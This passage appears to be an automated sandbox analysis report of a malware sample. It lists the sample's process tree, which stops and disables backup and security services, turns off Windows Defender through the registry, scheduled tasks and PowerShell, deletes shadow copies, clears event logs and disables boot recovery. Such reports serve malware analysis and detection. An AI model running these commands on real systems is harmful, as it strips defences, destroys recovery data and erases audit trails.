C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:528
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:620
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:1360
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1872 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1072
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1216 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1092
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1544 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1192
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:1208
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1780
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:864
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1956
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1720
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵PID:1884
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1728
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:1816
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:916
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1392
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1600
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1368
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1540
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:892
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:528
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1976
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:240
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:820
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:968
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:556
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1140
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1524
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:984
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1724
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1856
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1396
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:960
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1488
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1900
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1516
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1092
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1936
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1340
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1812
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1716
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1616
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:592
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1972
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1324
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1032 -
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1100
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1708 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1904 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:436 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1604 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:524 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1932 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:396 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:1868 -
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:2040
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2060 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2072
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2092 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2164
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2184
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD59f30b793b0aafa568f5e0fa9cd73815a
SHA179ad92f9e1f49339d4f7d849bafdef34bd946eca
SHA256be927cdd0de8e02e7f26db2f0f83ccc2d1f9c3d091eec71391b08e2ed6cd3933
SHA512667443d0b1aed9a4bcd687b6a1409c1d6ef896f5809743ac3bada9063070a4cb69c870f9e1020f7c17ae05976f330b4b773ec9a97b0a4e3ecad8e0a11abc05b7